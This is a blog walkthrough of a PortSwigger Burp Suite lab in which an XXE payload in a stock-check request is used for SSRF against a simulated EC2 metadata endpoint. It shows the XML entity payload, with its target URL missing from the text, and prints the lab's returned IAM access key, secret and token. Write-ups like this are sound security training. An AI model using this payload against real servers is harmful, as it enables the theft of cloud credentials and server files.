Burp Suite Lab — Exploiting XXE to perform SSRF attacks | WalkThrough


XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application’s processing of XML data. an attacker can escalate an XXE attack to compromise the underlying server or other back-end infrastructure, by leveraging the XXE vulnerability to perform server side request forgery (SSRF) attacks and now we are going to see how it’s done.


This lab has a “Check stock” feature that parses XML input and returns any unexpected values in the response.

The lab server is running a (simulated) EC2 metadata endpoint at the default URL, which is This endpoint can be used to retrieve data about the instance, some of which might be sensitive.

To solve the lab, exploit the XXE vulnerability to perform an SSRF attack that obtains the server’s IAM secret access key from the EC2 metadata endpoint.


As we can see website is using XML code for the request , lets try to modify it ;) .

Leaks /etc/passwd

So, this stock parameter is vulnerable to XXE attacks . Now lets check for SSRF attack.


Payload used :-

<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM ''>]><stockCheck><productId>&test;</productId><storeId>1</storeId></stockCheck>

Result: Success

Now, we have to gather the sensitive information.

To understand the part of getting access of EC2 Metadata and gaining the secret key , i would recommend to watch this video.


"Invalid product ID: {
"Code" : "Success",
"LastUpdated" : "2021-12-25T00:58:57.127618174Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "qDCrjy0AaGQCWz8WBVuB",
"SecretAccessKey" : "lbNES1djjQiVgc18Ay0ONAJ6RjT1QkHMfhpi7z6Q",
"Token" : "UvLHsxfn3cqSLHfDcNFp7k8X6roFSBKFDvQFWeBkDwzVZBVRRXtqRwlKKb5f7fT5T4T7uyEEWi52D3DMZUId0mPbDyrMh8jwlweNFbodOV5cDzxkUE5QoCLCn8YqRk490TX8KqW1pt93lnErjSZK8HMgxEi1J3CKjcueXFnThrq8FDeC3yo1ZCLPP2zJVoz6queBLzAgramaNQ9CbkE9qJhZwDi8Hm5f37A9Z9w3oLVBjSnB61eWRg4bSC4w4qHv",
"Expiration" : "2027-12-24T00:58:57.127618174Z"

We have successfully obtained the server’s IAM secret access key from the EC2 metadata endpoint using XXE vulnerability to perform SSRF.




eJPT | eCPPT | DarkArmy CTF Player

Love podcasts or audiobooks? Learn on the go with our new app.

READ/DOWNLOAD# The Perfect Weapon: War, Sabotage,

Digital Forensics Investigation Steps

Practical Malware Analysis — Chapter 1 — Lab 1-2 — Solution

Google Chrome’s Best Tips and Tricks — For Windows and Mac Computers

Two Years of UNION: A New Direction — A Message to Our CommUNNity

How To Become A Successful IT Asset Manager: The Do’s and Don’ts

DNS Tunneling

The GDPR Nightmare

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store


eJPT | eCPPT | DarkArmy CTF Player

More from Medium

SQL injection Union attack: Determining the number of columns required in an SQL injection UNION…

Network Services

Basic Pentesting — Process Report

Insecure Deserialization — FAQ